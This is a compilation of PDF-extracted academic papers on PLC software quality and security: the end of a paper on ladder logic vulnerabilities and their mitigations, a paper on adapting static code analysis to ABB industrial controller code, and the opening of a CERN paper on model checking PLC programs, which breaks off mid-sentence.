certain suspicious routines. Using hard coded values: in certain situation using hard coded values or parameters endangers the process or its related program; see Fig. 8. Numeric values are easier to modify than those driven by continuous feedback. Modification can be on purpose, inadvertent, or by malicious attacks. For instance, a programmer by mistake might enter a wrong value in the database table where the values of the instructions are easily displayed and accessible; that could also happen by toggling the values of the instruction displayed in the rung. Fig. 9 shows a solution that can keep source B numeric value updated even if it is modified inadvertently by a toggle or by updating the values in the PLC database table. Fig. 5.The tag y2 is missing related input(s). Fig. 6. Outputs instructions are properly energized. Fig. 7. Using an empty branch as a jumper. Fig. 8. Numeric values are vulnerable. ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply. Fig. 9. Compare real-time numeric values not card coded ones. Racing: occurs when two codes or operands of logic are racing against each other leading to inconsistent results and can be used to create a threat that could damage devices. Misplaced operands within the same code or even one rung - such as the racing scenario in timers is a good example that often happens. Fig. 10 shows that having the done bit of the timer (tmr1), tmr1.DN, before the branch causes a racing problem if the timer s accumulator reaches the value of the Preset one s (assuming X1 is always ON). In other words, whenever the timer (tmr1) is done, it is reset again and the Valve01 is energized because the precondition, tmr1.DN, is false. There is always a chance the Valve01 will never get turned off or be de-energized. That would make it hard to locate the problem because the logic looks legitimate. The proper correction is shown in Fig. 11. Lack of thorough diagnostics and alarm messages : when there are no detailed and in-depth alarms, diagnostics, or preconditions the devices might be at great risk because the operator will only notice the damage after it occurs. Overall, the resultant is device damage or time delay in recovering, debugging, or maintaining. For i nstance, not setting an alarm message or warning for motor overload before enabling or while running it could damage the motor especially if the physical overload switch is compromised or it does not exist. The problem will be more aggravated if the compromised device is critical e.g. nuclear reactor and yet lacking critical alarms or warning. Another concern is when there are sufficient alarms and warning messages that can prompt the operator, but they got disabled either through another wrong or malicious piece of logic or by external user who manages to get through the code. A good practice is to add a ladder logic code that can simulate all faults scenarios and check their status alive before running production. Another good practice is to create a heart- beat pulse bit flashes every 50ms that is synchronized with the alarms program section. Compiler warning: overlooking certain PLC compiler warnings would be critical since they might be a real threat; e.g. a compiler warns about duplicate outputs, Fig. 12. Unused tags or operands: dormant malicious code or external attacks might take advanta ge of any unused tag because they are already predefined and using them will be stealth and not raise any flag. So many PLC programmers leave unused tags in the PLC database. Any malicious attack the proper time and circumstances to trigger signals that might activate malicious output to interrupt or manipulate data. That can be done by utilizing instructions (Timers, Jumpers, etc.) that can overload the PLC OS, slow it down, truncate critical data, or generate certain datatype faults and errors. Program Mode: keeping the PLC in Program Mode or Unlocked Mode , allows others to intentionally or inadvertently upload wrong or malicious ladder logic code; jeopardizing the whole automated system. The user can even wipe out the whole ladder logic or upload any suspicious one. Also, Keeping the PLC in Program Mode , makes the PLC vulnerable to any code manipulation with no need to delete or overwrite the whole program. It allows others to do online editing for ladder logic (add or delete pieces of code or data) while the ladder logic is running. That can be done by any user without being noticed since there will be no need to do a critical ladder logic code upload to the PLC; only critical uploads usually cause systems to stop and reset. The lack of authentication : before uploading new or modified ladder logic code to the PLC no authentication is conducted. Attackers can use this to upload malicious code, vulnerable code, or improper code or they can even compromise the PLC. To avoid that, a software such as comparison tools should be used to ensure the integrity of critical pieces of code by comparing them to the original program. Fig. 10. Racing condition. Fig. 11. Racing condition solved. ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply. Fig. 12. Compilers warning. IV. LADDER LOGIC - BACKDOORS Many companies and vendors assume that ladder logic is secure and not accessible by hackers and intruders because the PLC networks are usually air gapped. But that is not true for the following reasons: Random threats: the malicious attack could be done by a floating malware that is designed to affect certain PLC brands. It is deployed remotely, by USB, or locally by infected PC on the PLC network. Such attacks could be initialized on purpose or inadvertent. Isolating PLC networks completely from others is not realistic because there is always a need to connect a PC or HMI which could be infected - to a PLC where a programmer needs to monitor or edit ladder logic. Internal threats : could be because of upset employees, bad coding practice, infected logic written on infected PC, or intentional attacks; e.g. give remote access to hackers, open certain ports, or insert infected USB. External threats : external stealthy access to the PLC code to either keep a malicious code dormant and trigger it at a proper time or to be a "hit and run" scenario. Dormant pieces of logic could be used to steal sensitive information and parameters which could be used latter on to sabotage or damag e automated systems. V. CONCLUSION Vulnerabilities of PLCs are growing, leading to an increasing risk of threats and attacks. There are few works and scattered local efforts involved in improving PLC ladder logic code, but challenges still there. In this paper we have solely focused on the code level vulnerabilities of ladder logic that resides and runs on PLCs. The paper provides a summary and details of some major fundamental ladder logic code vulnerabilities and threats. Those vulnerabilities might be existing in any typical ladder logic: unnoticed or unknown never thought of. Ladder logic code vulnerabilities could be dormant threat s that can be triggered at any time risking the whole automated system that is associated with. Even though code vulnerabilities could occur because of bad coding practice , some might be unknown even to professional programmers. In addition, we have provided solutions for the vulnerabilities mentioned above. Following the solutions and recommendations provided would highly mitigate, reduce, or eliminate malicious attacks or threat. REFERENCES [1] Langner R. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy . 2011; 9(3): 49-51. [2] Troy Nash, Backdoors and Holes in Network Perimeters A Case St udy for Improving Your Control System Security, Vol 1.1, August 20 05, Vulnerability and Risk Assessment Program, Lawrence Livermore National Laboratory, UCRL-MI- 215398 . [3] J. Weiss. Stuxnet: Cybersecurity Trojan Horse. InTech, 2010. [4] Alexander Gostev, The Flame: Questions and Answers , Securelis t Blog, Kaspersky,May 2012 https://www.securelist.com/en/blog/208193522/The_Flame_Question s_a nd_Answers [5] url: https://threatpost.com/blackenergy-malware-used-in-attacks -against- industrial -control-systems/109067/. (October 29, 2014). [Accessed 17/02/2018] [6] R. M. Lee, M. J. Assante, and T. Conway. Analysis of the Cyber Attack on the Ukrainian Power Grid. Technical report, E-ISAC, 2016. [7] Overload: Critical Lessons from 15 Years of ICS Vulnerabilities , URL: https://www2.fireeye.com/rs/848-DID-242/images/ics-vulnerabilit y- trend -report-final.pdf, August 2016. [8] Kaspersky Lab, Industrial Control Systems Vulnerabilities Stat istics, 2015.URL:https://kasperskycontenthub.com/securelist/files/2016/ 07/KL_ REPORT_ICS_Statistic_vulnerabilities.pdf [9] S. Corporation, Internet Security Threat Report | Appendices, VOLUME 21, APRIL 2016. [10] Valentine, S. and Farkas, C. Software Security: Application-Lev el Vulnerabilities in SCADA Systems. IRI 2011. [11] Z. Zhang, W. Susilo, R. Raad, Mobile ad-hoc network key managem ent with certificateless cryptography, Signal Processing and Commun ication Systems, ICSPCS 2008. 2nd International Conference on, 2008, IE EE. [12] S . Q a z i , R . R a a d , Y . M u , W . S u s i l o , S e c u r i n g D S R a g a i n s t w o r m h o le attacks in multirate ad hoc networks, Journal of Network and Co mputer Applications, Vol. 36, 2, pp 582 -592, 2013, Elsevier. [13] S. Qazi, R. Raad, Y. Mu, W. Susilo, Multirate DelPHI to secure multirate ad hoc networks against wormhole attacks, Journal of Informatio n Security and Applications, Volume 39, pp 31-40, Elsevier, 2018. [14] "PLC Security Risk: Controller Operating Systems - Tofino Indus trial Security Solution". www.tofinosecurity.com. [15] https://www.isa.org/standards-publications/isa-publications/int ech- magazine/2012/october/system-integration-iec-61131-3-industrial - control-programming-standard-advancements/ ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply.
Applying_static_code_analysis_on_industrial_controller_code.pdf
Static code analysis techniques are a well- established tool to improve the e ciency of software developers and for checking the correctness of safety-critical software com- ponents. However , their use is often limited to general purpose or mainstream programming languages. For these languages, static code analysis has found its way into many integrated development environments and is available to a large number of software developers. In other domains, e. g., for the programming languages used to develop many industrial control applications,tools supporting sophisticated static code analysis techniques arerarely used. This paper reports on the experience of the authors while adapting static code analysis to a software development environment for engineering the control software of industrialprocess automation systems. The applicability of static codeanalysis for industrial controller code is demonstrated by a casestudy using a real-world control system.
Applying Static Code Analysis on Industrial Controller Code Stefan Stattelmann , Sebastian Biallas , Bastian Schlich , and Stefan Kowalewski ABB Corporate Research Germany, Ladenburg, Germany Email: [email protected] Embedded Software Laboratory, RWTH Aachen University, Aachen, Germany Email: [email protected] I. Introduction In industry, automation and control tasks are frequently operated using programmable logic controllers (PLCs). This paper describes the experience of the authors while adapting the Arcade.PLC1framework as described by Biallas et al. in [1] for use with the ABB Compact Control Builder control application development environment. The goal of this project was to apply static analysis techniques to programming languages of the IEC 61131-3 standard [2] used in ABB Compact Control Builder in order to improve the development process of control applications. Software development environments for IEC 61131-3 lan- guages often lack any support for static code analysis, except for error messages during compilation. There are some commercial tools available for checking syntactic properties of control applications or individual modules. However, these tools only check very basic properties (e. g., coding guidelines) [3] and are not integrated into the development environment. While the latter is often intended, e. g., to avoid recerti cation of safety-related software tools, the very basic nature of existing tools might also be rooted in a lack of awareness about the capabilities of formal methods in the automation domain. Improving this awareness was part of the motivation for the work described in the following. II. ABB Compact Control Builder and Arcade.PLC ABB Compact Control Builder is an ABB tool to develop control applications for AC 800M automation controllers. This family of control devices is used for the automation of complex industrial processes, e. g., in the chemical industry. While the 1Aachen Rigorous Code Analysis and Debugging Environment for PLCscore languages used in Compact Control Builder are a subset of the languages de ned in IEC 61131-3, there are certain extensions to the standard. This includes instantiation rules, e. g., singleton function blocks, and means to specify the order in which function blocks in an aggregated type are executed. One distinguishing factor of the AC 800M controller, and thus the respective Control Builder tools, is the use of native code execution. This means that all control programs are compiled from source code into binary machine code before deploying them to the controller. This includes all function block types and other modules provided as reusable libraries, except for certain rmware functions. The latter are part of the runtime environment of the controller. However, Compact Control Builder libraries are not distributed in compiled form, but as source code. To avoid modi cations and inappropriate use of library components by control engineers developing a control application, the source code les are encrypted. Depending on the level of protection, this encryption can include only the internal code or the complete interface of the components. In both cases, Compact Control Builder decrypts the libraries to perform the compilation from source code into native code. Arcade.PLC is a framework for the analysis and veri cation of programs for PLCs. Unmodi ed PLC programs in the languages Instruction List, Function Block Diagram, and Structured Text can be supplied by the user of the tool. Then, one function, function block or program can be selected formodel checking or static analysis. Arcade.PLC allows for specifying the intended functionality of function blocks or control programs using di erent logics as speci cation language. The integrated model checker can then prove or refute that a program conforms to the given speci cation. The otherkey aspect of Arcade.PLC is static analysis using abstract interpretation [4], which is the main focus of this paper. Figure 1 depicts the static analysis process of Arcade.PLC. Each program is rst translated into an intermediate representation (IR). This IR only contains simple instructions (assignments, jumps, conditional jumps, calls). It normalizes di erent PLC languages and simpli es further analyses. Then, a control ow graph (CFG) is build from the IR. This CFG is then analyzed with a ow-sensitive, partly context-sensitive abstract interpretation framework that annotates each node of the CFG with abstract values for the relevant variables. This information is processed by the check engine which executes a set of prede ned checks. If a violation is detected, the IR is mapped back to the original source code position and the warning is presented to the user. 2014 IEEE Emerging T ec hnology and F actory Automation (ETF A) 978-1-4799-4845-1/14/$31.00 c/circlecopyrt 2014 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply.   $ %     !  %                   #  Fig. 1. The static analysis process of Arcade.PLC [5] III. Non-Technical Challenges A. Understanding the Domain Understanding the domain of industrial automation is a key challenge for deploying static analysis techniques in this context. One very important aspect is that the development practices for control applications di er from those used in companies only dealing in software. The di erent approach to software development in the automation domain prohibits applying existing o -the-shelf solutions for general purpose programming languages. One very obvious reason for this is the use of domain-speci c programming languages, e. g., those de ned in IEC 61131-3, but the di erences go beyond that. In most cases, control programs aim to mimic the real-world and the components they are interacting with. This leads to a software development process which is based on frequent reuse of standard components to control certain parts of the system. When a program is written for a concrete system, these components are just instantiated, con gured, and connected in an appropriate way. As the developer of an application might not know all internal details of the instantiated components, there is a large potential for programming errors. On the other hand, the relative simplicity of the IEC 61131-3 languages makes them attractive for analysis. The troublesome features of other programming languages, e. g., pointers, ref- erences, and dynamic memory allocation, are not present inthese languages. Although when looking at real-world code, the hardness of this claim is softened, as there are extensions which introduce these features. Overall, the semantics of the languages used in control applications is straightforward and thus, they are easy to analyze. B. Expectations vs. Reality While most development environments for control appli- cations claim to follow the IEC 61131-3 standard [2], in practice each vendor modi es and extends on the programming languages de ned in the standard. This also applies to ABB Compact Control Builder. One very obvious deviation from IEC 61131-3 standard is that the interface and the internal variables of a function block are not de ned in the source code itself, but using specialized tables which are part of the development environment. Thus, this information has to be extracted from proprietary XML les. It can also be accessed using a special interface based on .net technology. As Arcade.PLC is based on Java, we chose not to use this interface and work on the XML les directly.We encountered one intricate extensions which makes Compact Control Builder programs syntactically incompatible with the existing Structured Text parser in Arcade.PLC: for a certain type of variable, it is possible to append the su x :status to scan their internal state. As the operator :can usually only occur within switch-statements, the existing parser reported the use of this feature as an error. One important lesson we learned is that in the end, real- world code is the best way to learn how software developers in a certain domain write code. Therefore, it is also the best way to identify the common use of programming languages as well as corner cases, which usually come with little documentation. Extensions like the previously described examples exist in many other development tools used in the automation domain as well. C. Access to Real-World Code The automation domain, in particular in the form of Compact Control Builder, comes with additional pitfalls when accessing source code for analysis. These pitfalls have organiza-tional and historical reasons. While all function block libraries are distributed as source code, the libraries are protected by encryption to avoid modi cation of the source code by the users of a library. This protection was introduced since modi cation by control engineers let to problems when di erent versions of a library were used for control applications which were relying on uno cial patches. Essentially, the fact that this encryption feature is necessary highlights that there is a lot of potential for improvement in the development process of control software. The missing information in encrypted libraries directly translates into a technical challenge: since libraries can be completely encrypted, even the signature of the function blocks in some libraries are not available for an external tool. Thus, the static analysis engine must derive an appropriate signature for types from encrypted libraries based on the way they are used in the unencrypted parts of the source code. During the adaption of Arcade.PLC for ABB Compact Control Builder, it was often not clear whether warnings were triggered by aws in the analysis or by missing information. This in turn let to a large amount of manual inspection of the source code. This issue could have been resolved by using unencrypted versions of the respective libraries, but this was not possible for all of them in the course of the project. IV . Technical Challenges A. Hidden Complexity At rst glance, many control application seem like a straightforward composition of relatively simple programorganizational units (POUs) with a dedicated functionality. However, since a control program can consist of many hundred POUs, the total number of lines of code in a program easily reaches tens of thousands. Furthermore, function block instanceshave their own internal variables and can interact through global variables. Thus, the state space to be handled by a static analysis tool can be very large. This complexity prohibits the use of simplistic analysis techniques for real-world applications. Additionally, the way function block calls are handled introduces even more variables: There are basically two ways to call a function block in most PLC languages. In the rst version, input and output parameters are passed directly (either given formal parameter names or as values only). Another, semantically equivalent way to call A function block, is to Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply. access the input and output parameters outside the call, such as: functionblock.input1 := 1; functionblock.input2 := a; functionblock(); result := functionblock.output; When implementing a static analysis which considers the data ow between function blocks, the above syntax entails that the input and output variables of every function block instance are accessible from its parent function block. For programsof realistic size, this makes the potential state space to be covered by an accurate static analysis very large. To reduce the amount of variables which have to be tracked, we use a pre- analysis for determining which variables of a function block areactually accessed in the remainder of the program [5] and only considers these variables during the analysis. This technique enables the analysis of complex programs in Arcade.PLC while still providing very accurate results, e. g., with respect to the possible value ranges of variables. B. Identifying Useful Analyses During the adaption of Arcade.PLC for Compact Control Builder we implemented checks for the following runtime errors and code smells: Conditions with constant result Illegal access into arrays or structured data types V ariables with constant values Missing case labels in switch statements Unreachable code Division by zero Most of these checks are based on well-known static analysis techniques and all of them are clearly useful from an academic perspective. However, not all of these checks yielded equally usable results in practice. All of these checks rely on the capability of Arcade.PLC to approximate the possible value range for all variables in a program. Based on this information, the additional checks can derive additional properties of a control program, e.g., that a conditional statement always yields the same result or that the value of a variable is constant. The remainder of this section will focus on the rst three checks. With respect to the check for conditions yielding a constant result, the following piece of control code shows a pattern which we frequently encountered during our case study: 42IfCONDITION1 Then 43 OUTPUT := 65535; 44ElsIf CONDITION2 Then 45 OUTPUT := INPUT1 And(INPUT2 Or(INPUT3 Xor65535)); 46ElsIf Not CONDITION2 Then 47 OUTPUT := INPUT1 And(INPUT2 Or(INPUT3 Xor0)); 48End_If; Checking the condition in line 46 is obviously super uous,as the condition in line 46 is the negation of the condition checked in line 44. Since line 46 can only be reached if the condition in line 44 is false, its condition will always be true. A simple else-statement would thus su ce in line 46 to preserve the original semantics of the code. Nonetheless, Arcade.PLC correctly reported that the condition in line 46 yields a constant result. However, since essentially every else-statement in the projects we analyzed was written in this way, this resulted in a larger number of reported warnings, which were not realproblems in the code. Thus, we ultimately chose to deactivate the analysis for conditions with constant results to make the number of warnings manageable. In addition, Compact Control Builder programs can make use of the rmware functions GetStructComponent and PutStructComponent . They allow accessing the n-th compo- nent of a structured data type. If nis less than 1 or greater than the number of elements in the structured data type, a runtime error is signaled during program execution. It is also checked if the accessed element has the wrong type. To allow for o ine checking of correct usage of these functions, Arcade.PLC rst determines the value range of the index expression of the respective calls. This is then used to check whether there are structure elements for all possible values of the indexexpression. If this is not the the case, a warning is issued. Additionally, it is also checked if all structure elements in the range described by the index expression have the correct type. The rst check is only an adaption of a well-known array index out of bounds check to these rmware functions. The second check, however, is a domain-speci c analysis which is able to detect an additional class of runtime errors statically. Two checks for constant variables were added to Ar- cade.PLC. The basic version only checks whether a variablenever changes its value over the execution of the program, while the more advanced version checks whether the constant variable is also used in a statement which should modify its value, e. g., an assignment. The rst variant only indicates a stylistic issue, while the second variant usually indicates a more severe problem in the code. During our case study, we encountered one function block where both types of warnings for constant variables were triggered. The respective variables were declared as follows: CLOCK : time := T#1m; COMPARE : int := 5; The rst variable CLOCK is a rather typical constant containing the value 1 minute and is used as a parameter for, e. g., timers. Compact Control Builder o ers the possibility to declare constants as so-called project constants , such that they are no longer variables. For projects that make use of this feature, this warning could identify other candidates that should be moved into the project constants. However, during our case study we learned that this is often not done intentionally to adjust certain values during commissioning of a system. For the other variable COMPARE , the warning was triggered that this variable contains a constant value, but is also written. It is only written in the following statement: COMPARE :=max(COMPARE,2); SinceCOMPARE is initialized to 5, the call to max will return 5, which, in turn, will not change the value of the variable. The above example illustrates how the result of static analyses can interact to implement further checks. The information about the constant value of COMPARE is combined with the information thatCOMPARE is used in an assignment statement. Furthermore, the example also demonstrates that the software engineering practices used for the development of control applications, e. g.,using variables to store constants which can be ne-tuned during commissioning, has a signi cant impact on the usefulness of certain static analyses. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply. Program #loc #FBs time #W 1 #W 2 #FP App1 / Program1 233 3<1s 6 0 0 App2 / Program2 2776 100 11 s 0 8 0 App2 / Program3 169 5 3 s 0 0 0 App2 / Program4 2684 100 146 s 0 301 0 App2 / Program5 206 12<1s 0 0 0 App3 / Program6 344 12<1s 3 0 0 App4 / Program7 3339 18 40 s 9 50 9 TABLE I. P art of the case study with anonymized program names V. C aseStudy After adapting Arcade.PLC, we were able to successfully apply it to a real-world control project comprising multiple networked PLCs. This project consisted of roughly 20 applica- tions and about 50,000 lines Structured Text (ST) code. The applications are further partitioned into programs, which share access to the same set of global variables. The programs and function blocks had between 100 and 3500 lines of ST and the programs contained up to 100 function block instances. Each of the applications had about 1000 global variables. Thus, analyzing the possible value ranges for all variables in the project was particularly challenging. Nonetheless, the complete runtime of the static analysis and the check engine on the entire project was only about 10 minutes. The anonymized results of a sample application from this case study are shown in Tab. I. The table shows the program we checked, the lines of ST code of the program (not including functions and function blocks used in the program), the numberof function blocks used (#FBs), the time for running the static analysis, the number of warnings in the main program (#W 1), the number of warning in other organization units (e. g., functionblocks) of the program (#W 2), and the number of false positives (#FP) in #W 1. All our checks were con gured in such a way that they could trigger in every location of the program including the function blocks that are used in the program. This, however, triggered warnings in these function blocks (summarized in #W 2). These warnings were raised for conditions that were always true/false and resulting in unreachable code in the function block instance. They arise because not every functionality of a function block is necessarily used in the main program. A function block might, e. g., have an input Enable to control the activation of some function. If the main program always needs this function, this input is hard-wired to true resulting in the warning condition is always true at the corresponding IF Enable THEN statement in the function block due to our context-sensitive analysis. Therefore we disabled these warnings for the function block instances used in the main program. We also disabled the warning for constant variables and only raised warnings for constant variables that are also written. After this ne-tuning, it turned out that the number of warnings and the number of false-positives was reasonably low. The remaining warnings were stylistic issues, e. g., redundant compares and disabled code, which had to be inspectedmanually. We also found a copy&paste error in Program6, in which a wrong variable name was used in one place causing unreachable code. In Program7, we got false positives for out- of-bounds accesses inside a loop. These false positives could be eliminated by introducing relational domains to our analysis,meaning also tracking the dependencies between variables. This is planned to be added in the future.VI. Related Work To the best of our knowledge, Bornot et al. [6] were the rst to describe static analysis techniques for PLC programs using an abstract interpretation framework which is similar to the one used in Arcade.PLC. Their approach, however, is limited to small programs written in Instruction List. Prahofer et al. [3] give an overview about di erent static code analysis techniques and their bene ts for IEC 61131-3 programs. Their approach is concerned with detecting bad programming practices (naming conventions, program complexity, code smells, dead locks) while our approach infers the possible values of all program variables to detect semantic programming errors. In their paper, they also give an assessment of the available commercial tools for static PLC code analysis, which, at the moment, seem to focus on syntactic checks only, e. g., the complicance with certain naming convention for variables. VII. Conclusion This paper reported on the adaption of an academic tool for static code analysis to a development environment for real- world control applications. After overcoming a multitude of challenges, both technical and non-technical, we were ableto apply static code analysis on a large software project foran industrial control system. What we learned is that when putting theory to practice, results will not always be as expected. Not every analysis which looks useful in theory can ful ll this promise in practice. On the other hand, looking at real- world code can inspire new analyses and triggers the need to optimize existing analysis techniques. We therefore believe that applying static analysis tools on large real-world projects helps tremendously in improving these tools. Whenever possible, information about the application domain should be considered. This includes considering the end user of an analysis tool. An ideal static analysis should be useful for someone who doesnot understand the underlying theories. Ultimately, practical usefulness trumps ideas which only exist on paper or can only be used by an expert in the eld. Acknowledgements This work was supported, in part, by the DFG research training group 1298 Algorithmic Synthesis of Reactive and Discrete-Continuous Systems and by the DFG Cluster of Ex- cellence on Ultra-high Speed Information and Communication,German Research Foundation grant DFG EXC 89. Further, the work of Sebastian Biallas was supported by the DFG. References [1] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A veri cation platform for programmable logic controllers, in ASE, ser. ASE 2012. ACM, 2012, pp. 338 341. [2] International Electrotechnical Commission (IEC), IEC 61131-3 Programmable Controllers Part 3: Programming languages, 2003. [3] H. Prahofer, F. Angerer, R. Ramler, H. Lacheiner, and F. Grillenberger, Opportunities and challenges of static code analysis of IEC 61131-3 programs, in ETF A, 2012. [4] P . Cousot and R. Cousot, Abstract interpretation: A uni ed lattice model for static analysis of programs by construction or approximation of xpoints, in POPL. ACM, 1977, pp. 238 252. [5] S. Biallas, S. Kowalewski, S. Stattelmann, and B. Schlich, E cient handling of states in abstract interpretation of industrial programmable logic controller code, in WODES. Cachan, France: IFAC, 2014. [6] S. Bornot, R. Huuck, B. Lukoschus, and Y . Lakhnech, Utilizing static analysis for programmable logic controllers, in ADPM, 2000, pp. 183 187. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:16 UTC from IEEE Xplore. Restrictions apply.
Applying_Model_Checking_to_Industrial-Sized_PLC_Programs.pdf
Programmable logic controllers (PLCs) are embed- ded computers widely used in industrial control systems. Ensuringthat a PLC software complies with its speci cation is a challeng-ing task. Formal veri cation has become a recommended practiceto ensure the correctness of safety-critical software, but is stillunderused in industry due to the complexity of building and man-aging formal models of real applications. In this paper, we proposea general methodology to perform automated model checking ofcomplex properties expressed in temporal logics [e.g., computa-tion tree logic (CTL) and linear temporal logic (LTL)] on PLCprograms. This methodology is based on an intermediate model(IM) meant to transform PLC programs written in various stan-dard languages [structured text (ST), sequential function chart(SFC), etc.] to different modeling languages of veri cation tools. We present the syntax and semantics of the IM, and the transfor- mation rules of the ST and SFC languages to the nuXmv modelchecker passing through the IM. Finally, two real cases studies ofthe European Organization for Nuclear Research (CERN) PLCprograms, written mainly in the ST language, are presented toillustrate and validate the proposed approach. Index T erms Automata, IEC 61131, model checking, modeling, nuXmv, programmable logic controller (PLC), veri cation. I. I NTRODUCTION DEVELOPING safe and robust programmable logic con- troller (PLC)-based control systems is a challenging task for control system engineers. One of the biggest dif culties is to ensure that the PLC program ful lls the system speci cation. Some standards, such as IEC 61508 [1], give some guidelinesand good practices, but this task remains challenging. Many dif- ferent techniques are widely applied in industry meant to check PLC programs, e.g., manual and automated testing or simu-lation facilities. However, they still present some signi cant problems, like the dif culty to check safety or liveness prop- erties, e.g., ensuring that a forbidden output value combinationnever occurs. Formal veri cation techniques can handle these Manuscript received June 30, 2014; revised June 29, 2015; accepted September 28, 2015. Date of publication October 08, 2015; date of current version December 02, 2015. Paper no. TII-15-0081. B. Fern ndez Adiego, D. Darvas, E. Blanco Vi uela, and J.-C. Tournier are with the European Organization for Nuclear Research (CERN), Geneva 1211, Switzerland (e-mail: [email protected]; [email protected]; [email protected]; [email protected]). S. Bliudze is with the Ecole polytechnique f d rale de Lausanne, Lausanne 1015, Switzerland (e-mail: simon.bliudze@ep .ch). J. O. Blech is with Royal Melbourne Institute of Technology (RMIT) University, Melbourne, VIC 3000, Australia (e-mail: janolaf.blech@rmit. edu.au). V . M. Gonz lez Su rez is with the University of Oviedo, Oviedo 33003, Spain (e-mail: [email protected]). Color versions of one or more of the gures in this paper are available online at http://ieeexplore.ieee.org. Digital Object Identi er 10.1109/TII.2015.2489184problems, but bring other challenges to the control engineers such as the construction of the formal models and the state space explosion when applied to real-life software applications. A. Contribution Our motivation is to nd software faults (bugs) by apply- ing automated formal veri cation of complex properties expressed in temporal logic to real-life PLC control systems developed at CERN, the European Organization for Nuclear Research. We provide a general methodology for automatic cre- ation and veri cation of formal models from code written in different PLC languages, which also handles the state spaceexplosion problem. Although the main focus of this paper is on the transformation of PLC programs into formal models, we provide a description of the full methodology and illustrate it ontwo real-life examples. The speci c contributions of this paper are as follows. 1) We present the formal transformation rules from Structured Text (ST) and Sequential Function Chart (SFC) the two most used languages in CERN PLC control systems to intermediate model (IM) and givean overview of the transformation from IM to one of the selected model checker modeling languages: nuXmv. This is presented in Section IV. 2) The methods proposed in our previous work are extended to be applicable to large, industrial-size PLC programs. The methodology has been applied to real-life systems at CERN. The experimental results are discussed in Section V. This paper presents an extension of a previous work meant to bring formal veri cation to the industrial automation commu- nity. A rst method [2] was proposed to model various softwarecomponents of PLC programs developed at CERN, using the BIP framework exclusively. A rst version of the transforma- tion rules from ST code to the NuSMV modeling language isdescribed in [3]. Compared to this previous work, this paper: 1) extends and re nes the rules presented previously; 2) encom- passes other languages than ST; and 3) presents an applicationof the approach to a real-life case study. The model reduction techniques and the representation of time-related behavior is not in the main scope of this paper, but the methods used in [4]and [5] can be applied here as well. B. Related Work Although application of formal methods to PLC software has been extensively studied in the existing literature [6] [25], none of the described methods achieves the goals stated above. 1551-3203 2015 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. FERN NDEZ ADIEGO et al. : APPLYING MODEL CHECKING TO INDUSTRIAL-SIZED PLC PROGRAMS 1401 In [6], one can nd a fairly complete survey and classi cation of PLC veri cation methods. Using this classi cation, our method is in the M-A-M group, meaning that it is a model- based approach, and relies on automata and model checking. A recent survey [26] introduces different classi cations formodel-checking methods applied to the PLC domain. Our method covers many different classes, e.g., it covers multiple PLC languages and multiple system sizes. Furthermore, it aimsto be fully automated. The application area is also broad, as PLCs are used for many purposes at CERN. Some commercial tools, e.g., SCADE from Esterel Technologies, 1provide solutions for the generation of safe PLC programs, where certi ed PLC code is automatically gener- ated from a formal speci cation. This approach does not t thepractical industrial requirements, as often already existing PLC programs have to be veri ed. In the academic literature, some of the work only targets the modeling of PLCs without providing a veri cation solu- tion [7]. Other authors apply formal veri cation, but only for small examples, without discussing the reduction in the models that are inevitable for verifying industrial-sized programs [8] [16]. Many papers do not address the generation of the modelfrom the PLC program or limit themselves to explaining the high-level principles [10] [20]. Finally, most of the work tar- gets a single PLC language, with just a few approaches handlingmultiple ones (e.g., [21] and [22]). In [18], counterexample-guided abstraction re nement (CEGAR) is applied to models of PLC programs, but onlyACTL (computation tree logic with only universal path quan- ti ers) formalism is supported for property speci cations. The work in [24] uses CEGAR too, but only for reachability analy-sis. In [23], the authors introduce powerful reduction methods applied to Instruction List (IL) code. Although this approach could be extended to other languages, reliance on satis abil-ity modulo theories (SMT) solvers restricts its applicability to safety requirements. Some work targets speci cally the veri cation of ST pro- grams [21], [22]. However, the methods described in [21] restrict the requirements to assertions, which have smallerexpressiveness than linear temporal logic (LTL) or computa- tion tree logic (CTL). Although powerful reduction techniques are proposed in [22], they also have strong limitations. Forinstance, programs can only contain non-Boolean variables and no loops. Applicability of this method for industrial-sized appli- cations at CERN is questionable, since these would containhighly complex Boolean expressions. The approach based on IM, proposed in this paper, is new in the PLC domain; however, approaches using similar veri ca-tion techniques have been applied in other domains [27], [28]. This paper is organized as follows. Section II presents a general description of PLCs. Section III is dedicated to anoverview of the methodology and the applied IM. Section IV discusses the transformation from the ST and SFC languages to IM and gives a high-level overview of the transformationsfrom IM to nuXmv and of the reduction techniques applied to IM. Section V presents experimental results obtained by applying our methodology to CERN control systems. Finally, 1[Online]. Available: http://www.esterel-technologies.com/products/scade- suite/in Section VI, we discuss the presented results and possible directions for future work. II. P ROGRAMMABLE LOGIC CONTROLLERS This section presents the PLC concepts necessary to jus- tify the proposed modeling strategy. PLC is a widely used programmable electronic device designed for controlling indus-trial processes. It mainly consists of a processing unit and input/output modules to acquire and act with sensors and actuators of the process. Even though the architecture and pro-gramming of PLCs is de ned in the IEC 61131 standard [29], there are minor differences in the implementation of differ- ent manufacturers. In this work, we focus on Siemens 